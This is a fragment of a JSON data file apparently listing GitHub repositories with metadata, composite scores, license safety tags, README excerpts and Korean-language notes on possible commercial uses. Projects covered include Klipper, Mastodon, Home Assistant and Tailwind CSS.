Klipper project!\n\n[![Klipper](docs/img/klipper-logo-small.png)](https://www.klipper3d.org/)\n\nhttps://www.klipper3d.org/\n\nThe Klipper firmware controls 3d-Printers. It combines the power of a\ngeneral purpose computer with one or more micro-controllers. See the\n[features document](https://www.klipper3d.org/Features.html) for more\ninformation on why you should use the Klipper software.\n\nStart by [installing Klipper software](https://www.klipper3d.org/Installation.html).\n\nKlipper software is Free Software. See the [license](COPYING) or read\nthe [documentation](https://www.klipper3d.org/Overview.html). We\ndepend on the generous support from our\n[sponsors](https://www.klipper3d.org/Sponsors.html).\n","composite_score":0.2007,"license_safety_tag":"restricted"},{"name":"ReactTraining/react-router","github_url":"https://github.com/ReactTraining/react-router","stars":15,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# React Router 저장소 분석\n\n## 왜 보물인가\n웹사이트 페이지 이동을 쉽게 관리할 수 있게 해주는 핵심 도구로, 모든 현대적인 웹서비스에서 거의 필수적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 사용자 대시보드, 설정 페이지 등 여러 화면을 오갈 때 필요한 페이지 관리 시스템\n- **내부 업무 도구**: 직원들이 사","readme_excerpt":"[![npm package][npm-badge]][npm] [![build][build-badge]][build]\n\n[npm-badge]: https://img.shields.io/npm/v/react-router-dom.svg\n[npm]: https://www.npmjs.org/package/react-router-dom\n[build-badge]: https://img.shields.io/github/actions/workflow/status/remix-run/react-router/test.yml?branch=dev&style=square\n[build]: https://github.com/remix-run/react-router/actions/workflows/test.yml\n\nReact Router is a multi-strategy router for React bridging the gap from React 18 to React 19. You can use it maximally as a React framework or minimally as a library with your own architecture.\n\n- [Getting Started - Framework](https://reactrouter.com/start/framework/installation)\n- [Getting Started - Library](https://reactrouter.com/start/library/installation)\n- [Upgrade from v6](https://reactrouter.com/upgrading/v6)\n- [Upgrade from Remix](https://reactrouter.com/upgrading/remix)\n- [Changelog](https://github.com/remix-run/react-router/blob/main/CHANGELOG.md)\n\n## Packages\n\n- [`react-router`](./packages/react","composite_score":0.2007,"license_safety_tag":"safe"},{"name":"Xhofe/alist","github_url":"https://github.com/Xhofe/alist","stars":5,"language":"Go","license":"AGPL-3.0","abandonment_months":0,"description":"# Xhofe/alist 분석 보고서\n\n## 왜 보물인가\n여러 클라우드 서비스(구글 드라이브, 드롭박스 등)의 파일들을 한 곳에서 통합으로 관리할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업용 파일 관리 웹사이트로 구독 모델(월 9.99~49.99달러)로 판매\n2. **내부 업무 도구**: 대기업의 산재된 클라우드 ","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://alistgo.com\"><img width=\"100px\" alt=\"logo\" src=\"https://cdn.jsdelivr.net/gh/alist-org/logo@main/logo.svg\"/></a>\n  <p><em>🗂️A file list program that supports multiple storages, powered by Gin and Solidjs.</em></p>\n<div>\n  <a href=\"https://goreportcard.com/report/github.com/alist-org/alist/v3\">\n    <img src=\"https://goreportcard.com/badge/github.com/alist-org/alist/v3\" alt=\"latest version\" />\n  </a>\n  <a href=\"https://github.com/alist-org/alist/blob/main/LICENSE\">\n    <img src=\"https://img.shields.io/github/license/Xhofe/alist\" alt=\"License\" />\n  </a>\n  <a href=\"https://github.com/alist-org/alist/actions?query=workflow%3ABuild\">\n    <img src=\"https://img.shields.io/github/actions/workflow/status/Xhofe/alist/build.yml?branch=main\" alt=\"Build status\" />\n  </a>\n  <a href=\"https://github.com/alist-org/alist/releases\">\n    <img src=\"https://img.shields.io/github/release/Xhofe/alist\" alt=\"latest version\" />\n  </a>\n  <a title=\"Crowdin\" target=\"_blank\" hre","composite_score":0.2007,"license_safety_tag":"risky"},{"name":"mac-cain13/R.swift","github_url":"https://github.com/mac-cain13/R.swift","stars":6,"language":"Swift","license":"mit","abandonment_months":14,"description":"# R.swift 저장소 분석\n\n## 왜 보물인가\n애플 앱 개발자들이 반복적으로 하는 리소스(이미지, 텍스트, 색상 등) 관리 작업을 자동화해주는 도구로, 개발 속도를 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 애플 개발자용 IDE 플러그인으로 제공하여 구독료 수익화\n2. **내부 업무 도구**: 대규모 앱 개발사의 ","readme_excerpt":"# R.swift [![Version](https://img.shields.io/cocoapods/v/R.swift.svg?style=flat)](https://cocoapods.org/pods/R.swift) [![License](https://img.shields.io/cocoapods/l/R.swift.svg?style=flat)](License) ![Platform](https://img.shields.io/cocoapods/p/R.swift.svg?style=flat)\n\n_Get strong typed, autocompleted resources like images, fonts and segues in Swift projects_\n\n## Why use this?\n\nIt makes your code that uses resources:\n- **Fully typed**, less casting and guessing what a method will return\n- **Compile time checked**, no more incorrect strings that make your app crash at runtime\n- **Autocompleted**, never have to guess that image name again\n\nCurrently you type:\n```swift\nlet icon = UIImage(named: \"settings-icon\")\nlet font = UIFont(name: \"San Francisco\", size: 42)\nlet color = UIColor(named: \"indicator highlight\")\nlet viewController = CustomViewController(nibName: \"CustomView\", bundle: nil)\nlet string = String(format: NSLocalizedString(\"welcome.withName\", comment: \"\"), locale: NSLocale.curre","composite_score":0.2006,"license_safety_tag":"safe"},{"name":"alibaba/transmittable-thread-local","github_url":"https://github.com/alibaba/transmittable-thread-local","stars":5,"language":"Java","license":"apache-2.0","abandonment_months":1,"description":"# Alibaba Transmittable Thread Local 분석\n\n## 왜 보물인가\n여러 작업이 동시에 실행될 때 각각의 작업 정보를 독립적으로 관리할 수 있는 기술로, 금융·전자상거래 같은 대규모 시스템에서 필수적인 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융 거래 SaaS**\n- 수천 명의 사용자가 동시에 송금할 때 각 거래의 사용자","readme_excerpt":"# <div align=\"center\"><a href=\"#dummy\"><img src=\"https://user-images.githubusercontent.com/1063891/233595946-4493119e-4e0c-4081-a382-0a20731c578e.png\" alt=\"📌 TransmittableThreadLocal(TTL)\"></a></div>\n\n> [!IMPORTANT]\n> 🚧 这个分支是`TransmittableThreadLocal(TTL) v3`，在开发中还没有发布。  \n> `v3`的版本说明、工作项列表及其进展，参见 [issue 432](https://github.com/alibaba/transmittable-thread-local/issues/432)。\n>\n> 👉 目前使用中的稳定发布版本`v2.x`在 [**分支`2.x`**](https://github.com/alibaba/transmittable-thread-local/tree/2.x)上。\n\n<p align=\"center\">\n<a href=\"https://github.com/alibaba/transmittable-thread-local/actions/workflows/ci.yaml\"><img src=\"https://img.shields.io/github/actions/workflow/status/alibaba/transmittable-thread-local/ci.yaml?branch=master&logo=github&logoColor=white&label=fast ci\" alt=\"Fast CI\"></a>\n<a href=\"https://github.com/alibaba/transmittable-thread-local/actions/workflows/strong_ci.yaml\"><img src=\"https://img.shields.io/github/actions/workflow/status/alibaba/transmittable-thread-local/strong_ci.yaml?branch=master","composite_score":0.2003,"license_safety_tag":"safe"},{"name":"pearmini/colorfu","github_url":"https://github.com/pearmini/colorfu","stars":8,"language":"Vue","license":"MIT","abandonment_months":10,"description":"# pearmini/colorfu 분석 보고서\n\n## 왜 보물인가\n색상을 쉽게 만들고 관리할 수 있는 도구로, 디자인이나 웹사이트를 만드는 사람들이 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 색상 팔레트 자동 생성 및 관리 웹 애플리케이션으로 월 구독료 수금\n2. **내부 업무 도구**: 디자인 팀의 브랜드 색상 관","readme_excerpt":"# ColorFu\n\nColorFu is where people can use words, colors, patterns and images to make unique wallpapers to express their feelings or ideas.\n\n![home](https://s2.loli.net/2021/12/19/VwQoEpFLWbgceHk.png)\n\n![example](https://i.loli.net/2021/11/21/rThjJi82VIsWZMa.png)\n\n## Why is it\n\nWriting the word \"福\" (Fu) is the tradition of Chinese New Year, people will write a big \"福\" on red paper and stick it on the door to express the good expectations of the new year.\n\n![fu](https://i.loli.net/2021/11/08/shFjeYXUEgGJ5AZ.png)\n\nThis is a great example that people use words and colors to express their feelings or ideas. And on the other hand, wallpaper is the most common thing we see everyday which should not be cold.\n\nWhat it if you can use more colors and more words to make wallpapers to express more feelings ? In that way, not only can you make your wallpapers beautiful, but also make them meaningful.\n\n![good mode](https://i.loli.net/2021/11/08/kdPIX5V2WxhoGeR.png)\n\n![be your self](https://i.loli.ne","composite_score":0.2002,"license_safety_tag":"safe"},{"name":"MaxMEllon/redux-action-timing-middleware","github_url":"https://github.com/MaxMEllon/redux-action-timing-middleware","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# redux-action-timing-middleware 상업화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 사용자 행동의 반응 속도를 자동으로 측정하고 최적화할 수 있는 도구로, 느린 서비스를 개선하려는 회사들이 찾는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 분석 대시보드**: 고객사의 앱 성능을 모니터링하는 웹 분석 서비스로 판매\n2","readme_excerpt":"# redux-action-timing-middleware\n\n![](./.github/demo1.png)\n\n![](./.github/demo2.png)\n\n> Add marker of redux-action to User Timing in profile.\n\nInstallation\n---\n\n```bash\n$ npm i --save-dev redux-action-timing-middleware\n# or\n$ yarn add --dev redux-action-timing-middleware\n```\n\nUsage\n---\n\n```javascript\nimport { applyMiddleware, compose, createStore } from \"redux\";\nimport actionTiming from \"redux-action-timing-middleware\"\n\nconst createReduxStore = (reducer, initialState) => {\n  const middlewares = [\n    // Please put top in middleware list.\n    actionTiming(),\n\n    middlewareA,\n    middlewareB\n  ]\n\n  return createStore(\n    reducer,\n    initialState,\n    compose(applyMiddleware(...middlewares))\n  )\n}\n\nexport default createReduxStore\n```\n\nOption\n---\n\n- actionTiming(enable: boolean = true): void\n\nPlease set NODE_ENV to arguments, if you use only development\n\n```javascript\nconst middlewares = [\n  // Please put top in middleware list.\n  actionTiming(process.env.NODE_ENV === 'development'),\n\n ","composite_score":0.2001,"license_safety_tag":"safe"},{"name":"tootsuite/mastodon","github_url":"https://github.com/tootsuite/mastodon","stars":7,"language":"Ruby","license":"agpl-3.0","abandonment_months":0,"description":"# Mastodon 저장소 분석\n\n## 왜 보물인가\n트위터처럼 사용할 수 있으면서도 중앙 통제 없이 누구나 자유롭게 운영할 수 있는 소셜 미디어 플랫폼으로, 개인정보 보호를 중시하는 사용자들이 점점 관심을 가지고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **회사 내부 소통 플랫폼**: 직원들이 뉴스 공유, 아이디어 제시, 팀 문화 형성을 할 수 있는 비공","readme_excerpt":"> [!NOTE]\n> Want to learn more about Mastodon?\n> Click below to find out more in a video.\n\n<p align=\"center\">\n  <a style=\"text-decoration:none\" href=\"https://www.youtube.com/watch?v=IPSbNdBmWKE\">\n    <img alt=\"Mastodon hero image\" src=\"./docs/hero-nodes.gif\" />\n  </a>\n</p>\n\n<p align=\"center\">\n  <a style=\"text-decoration:none\" href=\"https://github.com/mastodon/mastodon/releases\">\n    <img src=\"https://img.shields.io/github/release/mastodon/mastodon.svg\" alt=\"Release\" /></a>\n  <a style=\"text-decoration:none\" href=\"https://github.com/mastodon/mastodon/actions/workflows/test-ruby.yml\">\n    <img src=\"https://github.com/mastodon/mastodon/actions/workflows/test-ruby.yml/badge.svg\" alt=\"Ruby Testing\" /></a>\n  <a style=\"text-decoration:none\" href=\"https://crowdin.com/project/mastodon\">\n    <img src=\"https://d322cqt584bo4o.cloudfront.net/mastodon/localized.svg\" alt=\"Crowdin\" /></a>\n</p>\n\nMastodon is a **free, open-source social network server** based on [ActivityPub](https://www.w3.org/TR/activi","composite_score":0.2,"license_safety_tag":"risky"},{"name":"home-assistant/core","github_url":"https://github.com/home-assistant/core","stars":87085,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# Home Assistant Core 프로젝트 분석\n\n## 왜 보물인가\n집에 있는 모든 전자제품(조명, 온도조절기, 카메라 등)을 하나의 앱으로 통합 제어할 수 있는 오픈소스 플랫폼으로, 87,000명 이상이 신뢰하고 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 관리 SaaS**: 주택 소유자가 구독하여 집의 모든 기기를 클라우드로 관","readme_excerpt":"","composite_score":0.2,"license_safety_tag":"safe"},{"name":"wowchemy/starter-hugo-academic","github_url":"https://github.com/wowchemy/starter-hugo-academic","stars":5,"language":"Jupyter Notebook","license":"MIT","abandonment_months":0,"description":"# wowchemy/starter-hugo-academic 분석\n\n## 왜 보물인가\n누구나 몇 번의 클릭으로 자신의 학문적 성과를 멋진 웹사이트로 공개할 수 있는 템플릿입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 대학 교수나 연구자가 구독하는 '학자 포트폴리오 플랫폼'으로 월간 호스팅과 템플릿 업데이트 제공\n2. **내부 업무 도구**","readme_excerpt":"# [The Academic CV That Gets You Hired](https://github.com/HugoBlox/hugo-theme-academic-cv)\n\n[![Screenshot](.github/preview.webp)](https://hugoblox.com/templates/academic-cv?utm_source=github&utm_medium=readme&utm_content=preview)\n\n<!-- TODO: Replace with a short demo video showing Hugo Chat generating an academic profile page -->\n<!-- https://github.com/user-attachments/assets/REPLACE_ME -->\n\n<h1 align=\"center\">The Portfolio That Works While You Sleep</h1>\n\n<p align=\"center\">\n  <strong>Your unfair advantage in academia.</strong><br/>\n  Stop sending PDFs into the void. Build a living portfolio that boosts citations, attracts collaborators, and lands offers — all from simple Markdown files you own.<br/>\n  Built on <a href=\"https://github.com/HugoBlox/kit\">HugoBlox</a> — the open-source framework where AI generates your pages and you own everything as Markdown.\n</p>\n\n<p align=\"center\">\n  <a href=\"https://hugoblox.com/templates/academic-cv?utm_source=github&utm_medium=readme&utm_content=c","composite_score":0.2,"license_safety_tag":"safe"},{"name":"home-assistant/home-assistant","github_url":"https://github.com/home-assistant/home-assistant","stars":75,"language":"Python","license":"apache-2.0","abandonment_months":0,"description":"","readme_excerpt":"Home Assistant |Chat Status|\n=================================================================================\n\nOpen source home automation that puts local control and privacy first. Powered by a worldwide community of tinkerers and DIY enthusiasts. Perfect to run on a Raspberry Pi or a local server.\n\nCheck out `home-assistant.io <https://home-assistant.io>`__ for `a\ndemo <https://demo.home-assistant.io>`__, `installation instructions <https://home-assistant.io/getting-started/>`__,\n`tutorials <https://home-assistant.io/getting-started/automation/>`__ and `documentation <https://home-assistant.io/docs/>`__.\n\n|screenshot-states|\n\nFeatured integrations\n---------------------\n\n|screenshot-integrations|\n\nThe system is built using a modular approach so support for other devices or actions can be implemented easily. See also the `section on architecture <https://developers.home-assistant.io/docs/architecture_index/>`__ and the `section on creating your own\ncomponents <https://developers.home-","composite_score":0.2,"license_safety_tag":"safe"},{"name":"Significant-Gravitas/AutoGPT","github_url":"https://github.com/Significant-Gravitas/AutoGPT","stars":184373,"language":"Python","license":"NOASSERTION","abandonment_months":0,"description":"# AutoGPT 저장소 분석\n\n## 왜 보물인가\n사람이 하는 일을 AI가 자동으로 처리해주는 기술로, 18만 개 이상의 개발자가 관심을 가질 정도로 혁신적인 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 반복적인 업무(이메일 답변, 보고서 작성, 데이터 정리)를 자동화하는 월 구독 서비스\n2. **내부 업무 도구**: 대","readme_excerpt":"","composite_score":0.2,"license_safety_tag":"unknown"},{"name":"shardingjdbc/sharding-jdbc","github_url":"https://github.com/shardingjdbc/sharding-jdbc","stars":6,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Sharding-JDBC 상업화 분석\n\n## 왜 보물인가\n대규모 데이터를 다루는 기업들이 비용을 들여 직접 구축하던 '데이터 분산 처리 기술'을 오픈소스로 제공받을 수 있는 보물입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 대규모 전자상거래 SaaS**\n- 수백만 명의 고객 주문 정보를 빠르게 처리하는 백엔드 기술로 판매\n\n**2. 금융사 내부 거래 시","readme_excerpt":"## [Apache ShardingSphere - Enterprise Distributed Database Ecosystem](https://shardingsphere.apache.org/)\n\nBuilding the standards and ecosystem on top of heterogeneous databases, empowering enterprise data architecture transformation\n\n**Official Website:** [https://shardingsphere.apache.org/](https://shardingsphere.apache.org/)\n\n[![GitHub Release](https://img.shields.io/github/release/apache/shardingsphere.svg)](https://github.com/apache/shardingsphere/releases)\n[![Lines of Code](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=ncloc)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)\n\n[![CI](https://github.com/apache/shardingsphere/actions/workflows/ci.yml/badge.svg)](https://github.com/apache/shardingsphere/actions/workflows/ci.yml)\n[![Quality Gate Status](https://sonarcloud.io/api/project_badges/measure?project=apache_shardingsphere&metric=alert_status)](https://sonarcloud.io/summary/new_code?id=apache_shardingsphere)\n[![Technical","composite_score":0.2,"license_safety_tag":"safe"},{"name":"bulutyazilim/awesome-datascience","github_url":"https://github.com/bulutyazilim/awesome-datascience","stars":5,"language":"","license":"mit","abandonment_months":0,"description":"# awesome-datascience 상업화 분석\n\n## 왜 보물인가\n데이터 분석과 인공지능을 배우고 싶은 사람들을 위해 필요한 모든 학습 자료를 한곳에 모아놓은 가이드북입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼(SaaS)**: 이 자료들을 체계화하여 구독형 데이터 과학 학습 서비스로 판매\n2. **기업 내부 교육 도구**: 대기업의","readme_excerpt":"<div align=\"center\"><img src=\"./assets/head.jpg\"></div>\n\n# AWESOME DATA SCIENCE\n\n[![Awesome](https://cdn.jsdelivr.net/gh/sindresorhus/awesome@d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome) \n\nContributions are welcome - see [`CONTRIBUTING.md`](CONTRIBUTING.md).\n\n**An open-source Data Science repository to learn and apply concepts toward solving real- world problems.**\n\nThis is a shortcut path to start studying **Data Science**. Just follow the steps to answer the questions, \"What is Data Science, and what should I study to learn Data Science?\"\n\n\n<br>\n\n## $ [academic](https://academic.io/cli)\n\n```\n$ brew tap academic/tap\n$ brew install academic\n```\n\n## Sponsors\n\n| Sponsor | Pitch |\n| --- | --- |\n| --- | Be the first to sponsor! `github@academic.io` |\n\n\n\n## Table of Contents\n\n- [What is Data Science?](#what-is-data-science)\n- [Where do I Start?](#where-do-i-start)\n- [Agents](#agents)\n- [Training Resources](#training-resources)\n  - [Tuto","composite_score":0.2,"license_safety_tag":"safe"},{"name":"containous/traefik","github_url":"https://github.com/containous/traefik","stars":17,"language":"Go","license":"mit","abandonment_months":0,"description":"","readme_excerpt":"\n<p align=\"center\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"docs/content/assets/img/traefik.logo-dark.png\">\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"docs/content/assets/img/traefik.logo.png\">\n      <img alt=\"Traefik\" title=\"Traefik\" src=\"docs/content/assets/img/traefik.logo.png\">\n    </picture>\n</p>\n\n[![Docs](https://img.shields.io/badge/docs-current-brightgreen.svg)](https://doc.traefik.io/traefik)\n[![Go Report Card](https://goreportcard.com/badge/traefik/traefik)](https://goreportcard.com/report/traefik/traefik)\n[![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://github.com/traefik/traefik/blob/master/LICENSE.md)\n[![Join the community support forum at https://community.traefik.io/](https://img.shields.io/badge/style-register-green.svg?style=social&label=Discourse)](https://community.traefik.io/)\n[![Twitter](https://img.shields.io/twitter/follow/traefik.svg?style=social)](https://twitter.com/intent/follow?screen_n","composite_score":0.2,"license_safety_tag":"safe"},{"name":"pixijs/pixi.js","github_url":"https://github.com/pixijs/pixi.js","stars":6,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Pixi.js 저장소 분석\n\n## 왜 보물인가\n웹 브라우저에서 빠르고 부드러운 2D 그래픽과 애니메이션을 만들 수 있는 기술로, 게임, 교육용 앱, 인터랙티브 광고 등 다양한 분야에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n**SaaS 서비스**: 브라우저 기반 게임 플랫폼(구독형 게임 스트리밍 서비스) 개발\n**내부 업무 도구**: 대시보드","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://pixijs.com\" target=\"_blank\" rel=\"noopener noreferrer\">\n    <img height=\"150\" src=\"https://files.pixijs.download/branding/pixijs-logo-transparent-dark.svg?v=1\" alt=\"PixiJS logo\">\n  </a>\n</p>\n<br/>\n<p align=\"center\">\n  <a href=\"https://npmjs.com/package/pixi.js\"><img src=\"https://img.shields.io/npm/v/pixi.js.svg\" alt=\"npm package\"></a>\n  <a href=\"https://npmjs.com/package/pixi.js\"><img src=\"https://img.shields.io/npm/dm/pixi.js\" alt=\"npm downloads\"></a>\n  <a href=\"https://opencollective.com/pixijs\"><img src=\"https://opencollective.com/pixijs/tiers/badge.svg\" alt=\"open collective\"></a>\n</p>\n<p align=\"center\">\n <a href=\"https://pixijs.com/8.x/guides\">Guides</a> | <a href=\"https://pixijs.com/8.x/tutorials\">Tutorials</a> | <a href=\"https://pixijs.com/8.x/examples\">Examples</a> | <a href=\"https://pixijs.download/release/docs/index.html\">API Docs</a> | <a href=\"https://discord.gg/QrnxmQUPGV\">Discord</a> | <a href=\"https://bsky.app/profile/pixijs.com\">Blues","composite_score":0.2,"license_safety_tag":"safe"},{"name":"OpenZeppelin/zeppelin-solidity","github_url":"https://github.com/OpenZeppelin/zeppelin-solidity","stars":6,"language":"Solidity","license":"mit","abandonment_months":0,"description":"# OpenZeppelin/zeppelin-solidity 분석\n\n## 왜 보물인가\n블록체인 기술의 기초가 되는 안전한 코드 모음으로, 암호화폐와 디지털 자산 거래의 신뢰성을 보장하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **암호화폐 거래소 서비스**: 디지털 자산을 안전하게 보관하고 거래하는 SaaS 플랫폼\n2. **기업용 블록체인 시스템**","readme_excerpt":"# <img src=\"logo.svg\" alt=\"OpenZeppelin\" height=\"40px\">\n\n[![Github Release](https://img.shields.io/github/v/tag/OpenZeppelin/openzeppelin-contracts.svg?filter=v*&sort=semver&label=github)](https://github.com/OpenZeppelin/openzeppelin-contracts/releases/latest)\n[![NPM Package](https://img.shields.io/npm/v/@openzeppelin/contracts.svg)](https://www.npmjs.org/package/@openzeppelin/contracts)\n[![Coverage Status](https://codecov.io/gh/OpenZeppelin/openzeppelin-contracts/graph/badge.svg)](https://codecov.io/gh/OpenZeppelin/openzeppelin-contracts)\n[![GitPOAPs](https://public-api.gitpoap.io/v1/repo/OpenZeppelin/openzeppelin-contracts/badge)](https://www.gitpoap.io/gh/OpenZeppelin/openzeppelin-contracts)\n[![Docs](https://img.shields.io/badge/docs-%F0%9F%93%84-yellow)](https://docs.openzeppelin.com/contracts)\n[![Forum](https://img.shields.io/badge/forum-%F0%9F%92%AC-yellow)](https://forum.openzeppelin.com/)\n\n**A library for secure smart contract development.** Build on a solid foundation of commu","composite_score":0.2,"license_safety_tag":"safe"},{"name":"apache/incubator-superset","github_url":"https://github.com/apache/incubator-superset","stars":12,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Apache Incubator Superset 분석\n\n## 왜 보물인가\n복잡한 데이터를 누구나 이해할 수 있는 차트와 그래프로 자동으로 만들어주는 도구로, 기업의 의사결정 속도를 획기적으로 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 데이터 분석 플랫폼**\n- 중소 기업을 위한 클라우드 기반 분석 서비스로 월 구독료를 받으","readme_excerpt":"<!--\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements.  See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership.  The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License.  You may obtain a copy of the License at\n\n  http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied.  See the License for the\nspecific language governing permissions and limitations\nunder the License.\n-->\n\n# Superset\n\n[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/license/apache-2-0)\n[![Latest Release on Github](https://img.shields.io/github/v/release/apache/superset?sort=semver)](https://","composite_score":0.2,"license_safety_tag":"safe"},{"name":"zeit/next.js","github_url":"https://github.com/zeit/next.js","stars":23,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"","readme_excerpt":"<div align=\"center\">\n  <a href=\"https://nextjs.org\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://assets.vercel.com/image/upload/v1662130559/nextjs/Icon_dark_background.png\">\n      <img alt=\"Next.js logo\" src=\"https://assets.vercel.com/image/upload/v1662130559/nextjs/Icon_light_background.png\" height=\"128\">\n    </picture>\n  </a>\n  <h1>Next.js</h1>\n\n<a href=\"https://vercel.com\"><img alt=\"Vercel logo\" src=\"https://img.shields.io/badge/MADE%20BY%20Vercel-000000.svg?style=for-the-badge&logo=Vercel&labelColor=000\"></a>\n<a href=\"https://www.npmjs.com/package/next\"><img alt=\"NPM version\" src=\"https://img.shields.io/npm/v/next.svg?style=for-the-badge&labelColor=000000\"></a>\n<a href=\"https://github.com/vercel/next.js/blob/canary/license.md\"><img alt=\"License\" src=\"https://img.shields.io/npm/l/next.svg?style=for-the-badge&labelColor=000000\"></a>\n<a href=\"https://github.com/vercel/next.js/discussions\"><img alt=\"Join the community on GitHub\" src=\"https://img.shi","composite_score":0.2,"license_safety_tag":"safe"},{"name":"tailwindcss/tailwindcss","github_url":"https://github.com/tailwindcss/tailwindcss","stars":14,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# Tailwind CSS 저장소 분석\n\n## 왜 보물인가\n웹사이트 디자인을 빠르고 쉽게 만들 수 있도록 도와주는 오픈소스 도구로, 전 세계 수많은 개발자들이 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - 디자인 템플릿 구독 서비스**\nTailwind CSS 기반의 웹사이트 디자인 템플릿을 월간 구독으로 판매하는 서비스\n\n**","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://tailwindcss.com\" target=\"_blank\">\n    <picture>\n      <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://raw.githubusercontent.com/tailwindlabs/tailwindcss/HEAD/.github/logo-dark.svg\">\n      <source media=\"(prefers-color-scheme: light)\" srcset=\"https://raw.githubusercontent.com/tailwindlabs/tailwindcss/HEAD/.github/logo-light.svg\">\n      <img alt=\"Tailwind CSS\" src=\"https://raw.githubusercontent.com/tailwindlabs/tailwindcss/HEAD/.github/logo-light.svg\" width=\"350\" height=\"70\" style=\"max-width: 100%;\">\n    </picture>\n  </a>\n</p>\n\n<p align=\"center\">\n  A utility-first CSS framework for rapidly building custom user interfaces.\n</p>\n\n<p align=\"center\">\n    <a href=\"https://github.com/tailwindlabs/tailwindcss/actions\"><img src=\"https://img.shields.io/github/actions/workflow/status/tailwindlabs/tailwindcss/ci.yml?branch=main\" alt=\"Build Status\"></a>\n    <a href=\"https://www.npmjs.com/package/tailwindcss\"><img src=\"https://img.shields.io/npm/dt/t","composite_score":0.2,"license_safety_tag":"safe"},{"name":"arendst/Sonoff-Tasmota","github_url":"https://github.com/arendst/Sonoff-Tasmota","stars":8,"language":"C","license":"gpl-3.0","abandonment_months":0,"description":"# Sonoff-Tasmota 저장소 분석\n\n## 왜 보물인가\n집에 있는 스마트 조명, 콘센트 등 IoT 기기들을 자신의 서버로 제어할 수 있게 해주는 오픈소스로, 개인정보 유출 걱정 없이 기기를 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 건설사나 아파트 관리업체를 위한 \"스마트 홈 관리 플랫폼\" 구독 서비스\n2. ","readme_excerpt":"![Tasmota logo](/tools/logo/TASMOTA_FullLogo_Vector.svg#gh-light-mode-only)![Tasmota logo](/tools/logo/TASMOTA_FullLogo_Vector_White.svg#gh-dark-mode-only)\n\nAlternative firmware for [ESP8266](https://en.wikipedia.org/wiki/ESP8266) and [ESP32](https://en.wikipedia.org/wiki/ESP32) based devices with **easy configuration using webUI, OTA updates, automation using timers or rules, expandability and entirely local control over MQTT, HTTP, Serial or KNX**.\n_Written for PlatformIO._\n\n[![GitHub version](https://img.shields.io/github/release/arendst/Tasmota.svg)](http://ota.tasmota.com/tasmota/release)\n[![GitHub download](https://img.shields.io/github/downloads/arendst/Tasmota/total.svg)](https://github.com/arendst/Tasmota/releases/latest)\n[![License](https://img.shields.io/github/license/arendst/Tasmota.svg)](LICENSE.txt)\n[![Discord](https://img.shields.io/discord/479389167382691863.svg?logo=discord&logoColor=white&color=5865F2&label=Discord)](https://discord.gg/Ks2Kzd4)\n\n<hr></hr>\n\n**In light","composite_score":0.2,"license_safety_tag":"restricted"},{"name":"aspnet/AspNetCore.Docs","github_url":"https://github.com/aspnet/AspNetCore.Docs","stars":6,"language":"C#","license":"CC-BY-4.0","abandonment_months":0,"description":"# AspNet/AspNetCore.Docs 분석\n\n## 왜 보물인가\n마이크로소프트가 공식 제공하는 ASP.NET Core 학습 자료로, 웹 개발 기초부터 실무까지 체계적으로 배울 수 있는 가장 신뢰할 만한 참고서입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 회사 직원들을 위한 웹 개발 교육 플랫폼으로 판매\n- **내부 업무 도구**: 대","readme_excerpt":"# ASP.NET Core Docs\n\nThis repository contains the official [ASP.NET Core documentation](https://learn.microsoft.com/aspnet/core/introduction-to-aspnet-core). See the [Contributing Guide](CONTRIBUTING.md) and the [issues list](https://github.com/dotnet/AspNetCore.Docs/issues) if you would like to help.\n\nThe [`dotnet/AspNetDocs` GitHub repository](https://github.com/dotnet/AspNetDocs)contains the ASP.NET 